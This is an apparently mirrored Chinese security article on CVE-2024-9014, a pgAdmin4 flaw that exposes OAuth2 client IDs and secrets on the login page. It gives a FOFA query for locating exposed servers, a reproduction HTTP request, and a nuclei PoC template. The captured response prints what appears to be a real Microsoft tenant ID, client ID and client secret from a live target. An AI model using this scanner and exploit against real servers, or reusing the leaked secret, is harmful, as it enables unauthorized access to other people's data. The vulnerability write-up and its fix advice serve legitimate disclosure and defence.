mirror of
https://github.com/gelusus/wxvl.git
synced 2025-08-13 03:17:22 +00:00
5.6 KiB
5.6 KiB
CVE-2024-9014
原创 fgz AI与网安 2024-10-07 17:39
免
责
申
明
:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
pgAdmin4 OAuth2 client ID与secret敏感信息泄漏漏洞
02
—
漏洞影响
pgAdmin4 8.9-3.fc40
pgAdmin4 8.12-1.fc41
03
—
漏洞描述
pgAdmin4 是开源数据库 PostgreSQL 的图形管理工具。2024年互联网上披露 CVE-2024-9014 pgAdmin 4 OAuth2 client ID与secret敏感信息泄漏漏洞。攻击者可构造恶意请求获取客户端ID和密钥,从而导致未经授权访问其他用户数据。官方已发布安全更新,建议升级至最新版本。
04
—
FOFA搜索语句
icon_hash="1502815117"
05
—
漏洞复现
向靶场发送如下数据包
GET /login?next=/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept-Encoding: gzip
响应如下
HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src ws: http: data: blob: 'unsafe-inline' 'unsafe-eval';
Content-Type: text/html; charset=utf-8
Date: Mon, 07 Oct 2024 09:28:35 GMT
Server: gunicorn
Set-Cookie: pga4_session=363dd09a-fee5-403e-8e8f-d55680b3f182!eZ4oYiB5uSYYlK/N7KtvaLk4R1o5eKkz48mHvSualtk=; Expires=Tue, 08 Oct 2024 09:28:35 GMT; HttpOnly; Path=/; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
<!DOCTYPE html>
...
<script type="application/javascript">
try {
require(
['security.pages'],
function() {
window.renderSecurityPage('login_user', {"authSources": ["oauth2", "internal"], "authSourcesEnum": {"KERBEROS": "kerberos", "OAUTH2": "oauth2"}, "csrfToken": "ImY1NzA1ZmZkMWYzNDAyYzg1ZmU2ZGE5OTE3NDhhOTU1ZTBiOWM2Yzki.ZwOpww.lo_Rs3jMAy_gm5G4_Z6c-q7ISdc", "forgotPassUrl": "/browser/reset_password", "langOptions": [{"label": "English", "value": "en"}, {"label": "Chinese (Simplified)", "value": "zh"}, {"label": "Czech", "value": "cs"}, {"label": "French", "value": "fr"}, {"label": "German", "value": "de"}, {"label": "Indonesian", "value": "id"}, {"label": "Italian", "value": "it"}, {"label": "Japanese", "value": "ja"}, {"label": "Korean", "value": "ko"}, {"label": "Polish", "value": "pl"}, {"label": "Portuguese (Brazilian)", "value": "pt_BR"}, {"label": "Russian", "value": "ru"}, {"label": "Spanish", "value": "es"}], "loginBanner": "", "loginUrl": "/authenticate/login", "oauth2Config": [{"OAUTH2_API_BASE_URL": "https://graph.microsoft.com/oidc/userinfo", "OAUTH2_AUTHORIZATION_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/authorize", "OAUTH2_BUTTON_COLOR": "#0000ff", "OAUTH2_CLIENT_ID": "91a5b302-7076-4ab8-ae36-8ce782204f2f", "OAUTH2_CLIENT_SECRET": "5uE8Q~3RDpIEk2LfpFttHtBFtdfDMXF-aAKcDa5h", "OAUTH2_DISPLAY_NAME": "Microsoft", "OAUTH2_ICON": "fa-microsoft", "OAUTH2_NAME": "microsoft", "OAUTH2_SCOPE": "openid email", "OAUTH2_SERVER_METADATA_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/v2.0/.well-known/openid-configuration", "OAUTH2_TOKEN_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/token", "OAUTH2_USERINFO_ENDPOINT": "userinfo"}], "userLanguage": "en"},
{"messages": []});
}, function() {
console.log(arguments);
其中包含敏感信息,漏洞复现完成
06
—
nuclei poc
poc文件内容如下
id: CVE-2024-9014
info:
name: pgAdmin 4 - Authentication Bypass
author: s4e-io
severity: critical
description: |
pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
reference:
- https://github.com/EQSTLab/CVE-2024-9014
- https://github.com/pgadmin-org/pgadmin4/issues/7945
- https://nvd.nist.gov/vuln/detail/CVE-2024-9014
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-9014
cwe-id: CWE-522
epss-score: 0.00043
epss-percentile: 0.09595
metadata:
verified: true
max-request: 1
vendor: pgadmin-org
product: pgadmin4
fofa-query: "pgadmin4"
tags: cve,cve2024,pgadmin,exposure,auth-bypass
http:
- raw:
- |
GET /login?next=/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
negative: true
regex:
- 'OAUTH2_CLIENT_SECRET": null'
- type: word
part: body
words:
- '<title>pgAdmin 4</title>'
- 'OAUTH2_CLIENT_SECRET'
condition: and
- type: status
status:
- 200
07
—
修复建议
升级到最新版本。